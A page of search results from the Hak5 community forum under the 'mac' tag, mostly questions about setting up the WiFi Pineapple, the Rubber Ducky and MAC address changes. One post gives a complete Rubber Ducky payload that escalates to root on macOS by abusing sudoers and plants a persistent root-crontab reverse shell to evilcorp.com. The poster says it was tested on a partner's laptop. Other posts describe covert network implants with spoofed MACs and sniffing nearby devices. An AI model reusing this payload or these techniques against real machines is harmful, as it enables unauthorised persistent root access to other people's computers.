Jump to content

Search the Community

Showing results for tags 'mac'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I am running VMware Fusion on a Mac with a Windows 7 guest. My goal is to run the Invoke-Mimikatz payload for credential pilfering, which involves sending WIN-R (GUI R) to the Windows OS. However, because Windows 7 is running as a guest VM, the Windows OS doesn't actually see the ducky connect as a USB keyboard. The ducky connects to the host OS (Mac OSX) instead. When the script sends a 'GUI R', this doesn't seem to get passed to the guest VM (Windows), even if the focus is on the VM at the time. However, if I write a basic script that simply sends a 'STRING Hello World' and 'ENTER', then I see these characters appear, if I first open notepad to give it something to type into. Has anyone tried something like this before, or does anyone have an idea how to go about addressing this?
  2. How do I disable autoplay when I insert my Rubber Ducky into the computer cause everytime I plug it in my Drive shows up in all of the windows. Like this picture.
  3. I can't even seem to connect to my new Nano there is no response on http://172.16.42.1:1471 I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ??? Ifconfig output is below - and screen show is attached ... I'm stuck !!! Any ideas ? Is there a way to Hard Reset ?? ------------------------------------- en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 options=4<VLAN_MTU> ether 00:c0:ca:8f:b6:11 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa nd6 options=1<PERFORMNUD> media: autoselect (100baseTX <full-duplex,flow-control>) status: active bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 options=3<RXCSUM,TXCSUM> ether 9a:e0:d9:79:10:64 inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255 inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb Configuration: id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0 maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200 root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0 ipfilter disabled flags 0x2 member: en5 flags=3<LEARNING,DISCOVER> ifmaxaddr 0 port 10 priority 0 path cost 0 nd6 options=1<PERFORMNUD> media: autoselect status: active pineapple-setup-stuck.pdf
  4. I just recently got my tetra. It works great on linux systems, but I have a macbook that I would like to use the tetra on doesn't connect with the default IP address and does not show up in ifconfig. What am I doing wrong? Am I missing a step?
  5. Got my nano last night, super pumped! When I got to Networking I only see the option to select wlan1 as my interface, but it looks like this interferes with PineAP. Is there a way I can select eth0 as the interface and have it use my wifi on my mac to connect to the internet? Or is there an option to free up the second radio that I'm missing so I can use PineAP and be connected to the internet at the same time? I tried selecting Disable Management AP under the Access Points menu and I'm still only given the option to choose wlan1 as my interface in client mode. On a side note, when I plug in an additional alfa usb adapter to the nano, it recognizes wlan2 automagically. Are there any other options for client mode?
  6. I'm tring to get Kali to dual boot on my Macbook Air 2013. When I open a console and type lspci -vnn | grep -i net I get 03:00.0 Network controller [0280]: Broadcom Corporation BCM4360 802.11ac Wireless Network Adapter [14e4:43a0] (rev 03) Subsystem: Apple Inc. BCM4360 802.11ac Wireless Network Adapter [106b:0117] dmesg shows this error [ 2.953012] b43-phy0: Broadcom 4360 WLAN found (core revision 42) [ 2.954233] b43-phy0 ERROR: FOUND UNSUPPORTED PHY (Analog 12, Type 11 (AC), Revision 1) [ 2.954241] b43: probe of bcma0:1 failed with error -95 [ 2.954268] Broadcom 43xx driver loaded [ Features: PMNLS ] I've checked other forums with no success. Has anyone ever gotten the onboard wireless adapter to work with Kali?
  7. Apologies for the length of this, but it may help other people So yesterday I received my shiny new Tetra and thought "great, lets plug it in and have a play" :) The instructions are nice and simple: Download the latest WiFi Pineapple TETRA firmware - complete Plug the TETRA into your computer using the included USB Y cables - yep, done, pair of USB3 ports on my main Windows 10 PC. Also plugged in the mains adapter. Solid blue LED showing Browse to http://172.16.42.1:1471 (Only Chrome and Firefox are officially supported) - yeah. Nope. Not happening. Nada. Zip Follow the onscreen instructions to complete setup So, opened a command prompt and ran IPconfig APIA address on the USB-Ethernet port - not a good start. So its not picking up DHCP from the Tetra. OK thats probably the PC. Swap to laptop number 1. Windows 10 Plug in the Tetra to the two USB ports on the side. Still got a solid blue light on the Tetra. Still got APIA address on the USB Ethernet port Re-install the drivers for the USB-Ethernet port - still nada. The interface in windows is showing as connected, unidentified. Cannot connect to the management page Check the Wifi networks showing - 2x Pineapple_xxxx networks (presuming one 2.4 and one 5Ghz) - lets try connecting to them, and yep can "connect" but again, no DHCP address. Now mildly frustrated. Swap to laptop number 2. Windows 10 Plug in the Tetra to the two USB ports on the side. Still got a solid blue light on the Tetra. Still got APIA address on the USB Ethernet port Re-install the drivers for the USB-Ethernet port - still nada. The interface in windows is showing as connected, unidentified. Cannot connect to the management page Now getting more frustrated Swap to laptop number 3. Kali Linux 2 Plug in the Tetra to the two USB ports on the side. Still got a solid blue light on the Tetra. Still got APIA address on the USB Ethernet port Re-install the drivers for the USB-Ethernet port - still nada. The interface is showing in ifconfig but with not IP Cannot connect to the management page Now beginning to think hardware failure Swap to laptop number 4. Mac Install the Realtek driver for Mac, new USB 10/100 adapter appears Plug in the Tetra to the two USB ports on the side. Still got a solid blue light on the Tetra. Still got APIA address on the USB Ethernet port Re-install the drivers for the USB-Ethernet port - still nada. The interface in windows is showing as connected, unidentified. Cannot connect to the management page Now VERY frustrated and thinking about DoA's, RMA's back to the states.... OK, lets try something radical At this point the only thing I've got left is to rebuild my Kali box as a Windows 7 box. Which completes and then takes another couple of hours to patch. By this time I've gone down the pub for the evening. Laptop number "5". Kali Box rebuilt as Windows 7 Install the Realtek driver for Mac, new USB 10/100 adapter appears Plug in the Tetra to the two USB ports on the side. Still got a solid blue light on the Tetra. Still got APIA address on the USB Ethernet port Re-install the drivers for the USB-Ethernet port - still nada. The interface in windows is showing as connected, unidentified. Cannot connect to the management page Now convinced there is something wrong with the hardware. 5 different platforms, 4 different OS' and not one DHCP address. Nothing on the forums that seems to apply. Last thing to do - reapply the factory firmware Follow the instructions on the FAQ page and bang, once the firmware is "refreshed" back to factory, all of a sudden everything is working on my W7 laptop, and I could login, complete the setup etc. So its finally all working. TL;DR - if you really really can't connect to a new tetra and you've tried drivers, connectors, everything you can - try reapplying the factory firmware.
  8. It frustrated me that out of the box the Pineapple and Mac OSX Internet Sharing don't work. Sometimes I just want to use my OSX machine with the pineapple. I searched online but couldn't find a solution. And the Mac OSX ICS page on the wiki is still very very empty. So I looked into it and got it working. It isnt that hard. You can find the howto at http://champagneandsecurity.wordpress.com/2014/10/03/wifi-pineapple-and-mac-os-x-internet-sharing/ Hope it helps some of you Mac users out there.
  9. So you put how to setup internet sharing on both the windows installation and linux, I was wondering if you can help me do the internet sharing on my mac because i cannot find anywhere where it says ethernet on network settings ..
  10. Could someone please explain this? I don't get why the names of the networks will all show up but not the MAC addresses. And why can't I scroll through kismet individually as opposed to the whole linux command line.
  11. Hi, Looking for some help, total noob here. I've searched the forum and can't find any answers or similar problems to mine (i'm sure it's a simple noob error). Basically I've tried two different payloads, a simple "hello world" and a wall paper change. Both have the same issue which ends up with the desktop icons being re-named to the actual code that is in the text file / payload, whilst the payload is executing. As far as i'm aware the inject file is compiled correctly, and placed at the root of the ducky micro SD. I've also watched and followed the: Ducky quack start guideWith no luck. Any help or advice would be greatly appreciated (trying different delays right now). Cheers
  12. Hell-Low H5 FolkZ @SF, Just got a new Turtle and waz playin around with it. Seems to be quite k3wL, but there are problems with the mac changer of the wan interface. 1st issue - it does not work - the interface goes down and does not come back (eth1). after manually /etc/init.d/network restart all worx fine (with static IP settings and faked mac 2 deploy device in an secured environment with mac binding). 2nd issue - how can i make the mac change persist a power cycle. I want to deply that tiny device in a secured environment with static ip settings and mac binding. So i will loose contact to the turtle after a power cycle. The scenario ist to drop the device @ a network with static IP settings and i must fake the mac of an registered device to be able to autossh out of the network. The fake mac and the static ip settings must persist a power cycle or the device is "lost". Any suggestions ? Maybe a tiny shell script ? but where to put (for persistance) ?
  13. Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it!
  14. I'm fairly new to the whole wifi sniffing scene, but I think I want the Mark V since it seems like there's a good community and intuitive interface. I've done a little with OpenWRT stuff with some routers but it hasn't done it for me. I'm looking to buy the Mark V and configure it to do the following: I go to some public location I turn it on (+ maybe some small steps necessary to start the process) Starts displaying MAC addresses, signal strengths, and headers, of people's devices nearby with a timestamp Outputs to a log file preferably, or something I can save at some point I don't want to buy the Mark V and have to do a whole lot of my own coding since this project has a bit of a time crunch. Can anyone post some tutorials maybe, or any advice as to how to accomplish my goal with minimal sophistication? I have programming experience and all, but obviously the easier the better. Thank you
  15. Hello. I just got a usb rubber ducky in the past couple of days. I ran the OS X 10 second root on my other computer to test how it works. https://github.com/mosca1337/OSX-10-Second-Root How can I get rid of it from my computer because it is taking up a port?
  16. I'm using the Airodump Ng Scan Visualizer which takes a CSV file, so I configured a boot mode to output CSV. My airodump pcap is a decent sized file, and it finds lots of endpoints. When I write as CSV, it's a very small file and all the clients are not detected. Kismet gives me the most data but I can't get signal strength out of that, so that's out. Maybe there's something I need to add to the configuration? Take a look: Kismet: ifconfig wlan1 down && iwconfig wlan1 mode monitor && ifconfig wlan1 up && kismet_server && ifconfig wlan0 down Airodump Pcap: ifconfig wlan1 up; airmon-ng start wlan1; airodump-ng --write /sd/airodump.pcap --output-format pcap mon0 My attempt at making the airodump example code better (did give me a slightly larger file): ifconfig wlan0 down; ifconfig wlan1 down; iwconfig wlan1 monitor mode; ifconfig wlan1 up; airmon-ng start wlan1; airodump-ng --write /sd/dump.csv --output-format csv mon0 Airodump example code from boot modes page: ifconfig wlan1 down; iwconfig wlan1 monitor mode; ifconfig wlanifconfig wlan1 up; airmon-ng start wlan1; airodump-ng --write /sd/Newdump.csv --output-format csv mon0 Basically I'm not getting all the information I should be out of the csv's. The airodump.pcap is better, but not as good as kismet. However, I can't use Kismet since there's no signal strength really. I like the visualizer a lot so I want CSV's, and exporting as CSV from Wireshark didn't work for the program. If anyone knows another visualizer that'd be good. WifiSpy, which I saw on here a while back, didn't work too well for me. Thanks!
  17. Getting the .pcapdump files and importing them into wireshark just fine-- is there a way to get signal strength as well?
  18. Trying to get more information about the devices nearby when I use the device than just mac address. I have a web crawler for the mac address already, but is there any capability on this device I can use to get more?
  19. Hi all, I am working on a project that relies (among other things) on: - Setting an access point in RaspPi that bridges an ethernet connection from my macbook (check! done!). - Hard-assigning a MAC address to this access point. (this is where I am having problems). I was able to set up the whole network, and it works fine. I was also able to change my mac address, using (mainly) ifconfig + ether command. And it also worked. However, after changing the MAC address I cannot connect to such access point anymore with any device. I have tried several different methods, and all have failed. Am I trying to do something impossible here? Is there any work around to such thing? Just to know. I am changing the MAC address using the following lines: sudo service ifplugd stop sudo ifconfig wlan1 down ifconfig wlan1 hw ether [MAC ADDRESS] sudo service ifplugd start And the AP is set up by a bridge between the eth0 and wlan1. Thank you!
  20. I just recently bought the Wifi Pineapple Mark V (via UK) and i am using a Mac Air OS X Yosemite, first 2 days 'everything' worked fine, after that is was running slow and facing problems connecting to 172.16.42.1:1471 If i got a connection and could login, fusions did not load or half?! Or was spinning and spinning around...( i have installed the latest Firmware) Later i was not able to connect to 172.16.42.1:147 at all, i have watched a lot of video's and red many tips, but it was not helping me to fix the issue. It was making me nuts, so i decided to buy a cheap Windows laptop, but even with this new laptop i am not able to connect to 172.16.42.1:147 anymore? Does anyone is facing the same problems with a Mac Air OS X Yosemite? Or does anyone could help me out? Is it possible (because of the Mac Air problems) that even on a different device (Windows) is am not able to connect anymore to 172.16.42.1:147 from my IP or other IP? All suggestions or tips are welcome!
  21. Hello friends, I wanted to know is there any way to identify the access point network by knowing only its MAC address. AND By only knowing MAC address of a network, is it possible to connect to that network. What are the commands used.
  22. Hi all, i bought a rubber ducky recently for bypass the EFI password like Teensy 3 https://www.youtube.com/watch?v=xXMiX-Bybsw But when typing the password, just type 1 ore 2 dot in the password case and after type enter, sometimes make nothing... anyone know the issue for that? Thanks in advance. Sorry for my bad english because i'm from belgium...
  23. So I am trying to figure out a way to somehow change my Mac Address on my ipod 4 (it is jailbroken) and ive tried a few things in terminal but overall no luck and as far as I can see no one else has any Proof that they can change their mac address either. Can anyone help? Thanks
  24. Hello everyone, I've been looking for the past couple of hours for the best wireless dongle to buy, which I found out that is the : alfa awus036nha. But then a second before purchasing I was thinking to myself, could be that it's not compatible with my mac ?. So the question is, is it compatible with my Mac OS 10.9.4 version ? From a first look it seems that it won't be compatible and that the one that is recommended to buy is awus036nh. What would you suggest me to get ?
  25. Hello, I just ordered and received my first Rubber Ducky in the mail. Let me just say that I think it's an incredible piece of equipment. I do however have one problem. I wrote my first Payload in TextEdit, correctly encoded it (via Terminal) onto the MicroSD, and then loaded it into the Rubber Ducky. When I insert the Rubber Ducky into my USB slot, the commands are being carried out; but the GUI command is not cooperating with my Mac OSX. Here is my code: GUI SPACE is intended to execute COMMAND SPACE on my Mac OSX. The rest of the code just does random stuff with finder because the first command didn't work. To fix this problem I think I need to update the Firmware? To update the firmware I believe I need to flash the Ducky... But I haven't been able to do this using dfu-programmer-0.5.4 I have follow this tutorial: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky According to the README file on dfu-programming-0.5.4 I am supposed to "./configure", "make", and "make install" before I can flash the Ducky(From my understanding). I am able to configure the file, but when I type "make" / "make install" I get the error message "Fatal Error: usb.h not found". I have tried everything to get around this. If someone could please help me update the Firmware on my Rubber Ducky, or tell me what I am doing wrong I would greatly appreciate it.
×
×
  • Create New...